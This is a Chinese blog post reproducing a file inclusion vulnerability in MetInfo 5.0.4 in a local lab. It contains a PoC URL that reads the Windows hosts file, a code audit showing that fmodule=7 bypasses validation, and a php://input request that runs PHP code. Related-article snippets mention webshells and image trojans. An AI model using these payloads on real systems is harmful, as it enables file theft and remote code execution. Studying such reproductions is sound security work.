[漏洞复现]metinfo5.0.4文件包含

原创 已于 2023-08-31 21:28:50 修改 · 248 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

于 2023-08-31 19:32:25 首次发布
该博客围绕metinfo5.0.4在windows server 2016环境下的漏洞展开。介绍了漏洞点,通过代码审计发现文件包含函数相关问题,将fmodule设为7可复现。还提及其他利用方式,如利用封装协议执行PHP命令,修改请求方式和参数可看到phpinfo界面。

环境

OS:windows server 2016

cms:metinfo5.0.4

web server:phpstudy pro

PHP版本:php5.3.29

漏洞点:

http://127.0.0.1/MetInfo5.0/about/index.php

image-20230831165916321

POC

?fmodule=7&module=c:/windows/system32/drivers/etc/hosts

image-20230831170151957

代码审计

打开./about/index.php

<?php
# MetInfo Enterprise Content Management System 
# Copyright (C) MetInfo Co.,Ltd (http://www.metinfo.cn). All rights reserved. 
$filpy = basename(dirname(__FILE__));
$fmodule=1;
require_once '../include/module.php';
require_once $module;
# This program is an open source system, commercial use, please consciously to purchase commercial license.
# Copyright (C) MetInfo Co., Ltd. (http://www.metinfo.cn). All rights reserved.
?>

发现使用了文件包含函数require_once,包含了文件module.php

我们打开./include/module.php

if($fmodule!=7){
    if($mdle==100)$mdle=3;
    if($mdle==101)$mdle=5;
    $module = $modulefname[$mdle][$mdtp];
    if($module==NULL){okinfo('../404.html');exit();}
    if($mdle==2||$mdle==3||$mdle==4||$mdle==5||$mdle==6){
        if($fmodule==$mdle){
            $module = $modulefname[$mdle][$mdtp];
        }
        else{
            okinfo('../404.html');exit();
        }
    }
    else{
        if($list){
            okinfo('../404.html');exit();
        }
        else{
            $module = $modulefname[$mdle][$mdtp];
        }
    }
    if($mdle==8){
    if(!$id)$id=$class1;
    $module = '../feedback/index.php';
    }
}

发现当fmodule!=7时,才会对module进行验证,所以我们将fmodule=7,即可复现

其他利用方式

利用封装协议php://input 执行PHP 命令;

右击,更改请求方式,修改请求方式为POST

image-20230831192112707

再将请求参数添加到url中

image-20230831192210777

更改url为 /MetInfo5.0/about/index.php?fmodule=7&module=php://input

image-20230831192311502

post请求参数为php代码

<?php
phpinfo();
?>

发送请求后即可看到phpinfo界面

image-20230831192518772

此外,还可以利用其他php封装协议

file://         #访问本地文件系统
http://         #访问HTTP(s)网址
ftp://          #访问FTP(s)URLs
php://          #访问各个输入/输出流(I/0 streams)
zlib://         #压缩流
data://         #数据(RFC2397)
glob://         #查找匹配的文件路径模式
phar://         #PHP归档
ssh2://         #Secure Shell 2
rar://          #RAR
ogg://          #音频流
expect://       #处理交互式的流

metinfo_5.0.4 任意文件本地包含漏洞复现metinfo_5.0.4_lfi)
薛定谔嘚喵博客
05-06 790
include/module.php” 和 $mouble 这个变量,进行跟踪,打开 …/include/module.php,module.php里还包含着 “common.inc.php” ,我们先对module.php进行代码审计。可以看到当fmodule这个变量不等于7时,它就会对$module进行验证,接着对"common.inc.php"进行跟踪。发现common.inc.php的这段代码有漏洞点,双$$符号可能存在变量覆盖漏洞。我们要让fmodule=7,绕过对$module的验证。
metinfov5.0.4漏洞复现
千寻的博客
02-29 2895
文章目录第一章 介绍第二章环境搭建第三章存在漏洞第一节SQL注入第一步 注入点第二步 盲注第三步 漏洞原理第二节文件包含第一节漏洞页面第二节漏洞利用第三节漏洞分析第四节文件上传第一步 漏洞页面第二步 漏洞利用第三步 漏洞分析免责声明 第一章 介绍 MetInfo企业网站管理系统采用php+ Mysql架构全站内置了SEO搜索引优化机制,支持用户自定义界面语言(全球各种语言),拥有企业网站常用的模块...
metinfo_5.0.4_filein-Include漏洞复现
m0_64583632的博客
02-06 502
metinfo_5.0.4_filein-Include漏洞复现
metinfo 5.0.4 文件上传漏洞复现
agrilly的博客
07-24 772
metinfo 、文件上传、漏洞、一句话木马
漏洞复现Metinfo5.0.4任意文件包含漏洞复现
过期的秋刀鱼
11-04 985
文件夹中有个新建文件shell.php,即可用蚁剑连接。下放入一张没有木马的图片,使用另一种方式制作图片木马。,当我们直接包含图片的时候,这段代码就会被执行。复制得到的base64编码格式的php代码。该段代码的含义是,在当前目录下创建一个名为。把POST请求体中的变量放到url中提交。,然后在下面写入php代码,点击send。上传图片木马,通过文件包含的方式去访问。bp拦截得到php源码的数据包。使用文件包含的方式去访问图片。该环境的文件上传点在。但是上传文件会失败,拿到webshell。
metinfo5.0.4文件包含
03-28
### 关于 Metinfo 5.0.4 版本中的文件包含漏洞及其修复方案 Metinfo 是一款流行的开源 CMS 系统,广泛用于构建企业网站和其他在线平台。然而,在其早期版本中存在一些已知的安全漏洞,其中包括文件包含漏洞。 ####...
metinfo全版本csrf漏洞(可导致重装)
u011066706的专栏
04-17 2116
漏洞文件/admin/app/batch/csvup.php 代码 <?php $depth='../'; require_once $depth.'../login/login_check.php'; setlocale(LC_ALL,array('zh_CN.gbk','zh_CN.gb2312','zh_CN.gb18030')); $codeold='gbk'; $codenew='u
metinfo_5.0.4_file-upload
weixin_43886198的博客
12-21 1426
metinfo_5.0.4_file-upload 漏洞描述 MetInfo 是一个专业的企业级CMS建站系统,它的5.0.4 版本存在任意文件上传漏洞漏洞危害等级 高危 影响版本 5.0.4 漏洞复现 基础环境 组件 版本 OS Windows 2008 R2 x64 Web Server phpStudy 2016(特别版) Source Code MetInfoV5.0.4 漏洞演示 本地构造HTML 表单,进行文件上传 变量覆盖,SQL注入(# %23),双写绕过。
metinfo 5.0.4 文件包含漏洞复现
一个努力学习网安的小牛马
11-15 407
metinfo cms 版本 5.0.4
[漏洞复现] MetInfo5.0.4文件包含漏洞
Da1NtY的博客
06-28 640
漏洞出现在中,因为利用了动态地址,所以存在漏洞漏洞检查语句(!
记一次MetInfo6.0.0文件包含漏洞复现
weixin_55404107的博客
10-20 2015
进行漏洞复现,读取敏感文件
MetInfo最新网站漏洞如何修复以及网站安全防护
网站安全专家
10-22 2051
metinfo漏洞于2018年10月20号被爆出存在sql注入漏洞,可以直接拿到网站管理员的权限,网站漏洞影响范围较广,包括目前最新的metinfo版本都会受到该漏洞的攻击,该metinfo漏洞产生的主要原因是可以绕过metinfo的安全过滤函数,导致可以直接插入恶意的sql注入语句执行到网站的后端里去,在数据库里执行管理员操作的一些功能,甚至可以直接sql注入到首页文件index.php去获取到...
MetInfo 任意文件读取漏洞的修复与绕过
Peter 的博客
02-11 2307
漏洞简介 MetInfo是一套使用PHP和Mysql开发的内容管理系统。 MetInfo 6.0.0~6.1.0版本中的 old_thumb.class.php文件存在任意文件读取漏洞。攻击者可利用漏洞读取网站上的敏感文件。 漏洞影响 MetInfo 6.0.0 MetInfo 6.1.0 漏洞分析 看到\MetInfo6\app\system\include\module\old_thumb...
Metinfo5.3.10文件包含分析
dengzhasong7076的博客
11-05 511
Metinfo5.3.10文件包含 漏洞成因 /admin/login/login_check.php <?php error_reporting(E_ERROR | E_WARNING | E_PARSE); if ($depth != '' && $depth != '../' && $depth != '../../') {die();} if...
Metinfo 5.3 后台getshell(远程文件包含漏洞)分析
__Curtain_
08-30 6445
最近准备入代码审计的坑,拿Metinfo来练练手,先找了下以前的版本整理下思路。 看了下大神的文章,代码审计的方法总体上分为两种:     1. 跟踪用户的输入数据,判断数据进入的每一个代码逻辑是否有可利用的点,此处的代码逻辑可以是一个函数,或者是条小小的条件判断语句。     2. 根据不同编程语言的特性,及其历史上经常产生漏洞的一些函数,功能,把这些点找出来,在分析函数调用时的参数,如果...
Metinfo v6.0.0 后台getshell
公众号shadow sock7
10-21 4029
这个漏洞在v5.3.19同样存在,不过前提是需要后台管理员的权限。但是如果是在v5.3.19,可以结合之前的管理员任意密码重置漏洞getshell。 Metinfo v5.3.19: 如文章中所说,这里的poc是: http://localhost/admin/column/save.php? name=123 &amp;action=editor &amp;foldername=upload &...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8842
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基准测试使用BBO-PSO-GA附Matlab代码.rar
最新发布
12-09
1.版本:matlab2014/2019a/2024a 2.附赠案例数据可直接运行。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值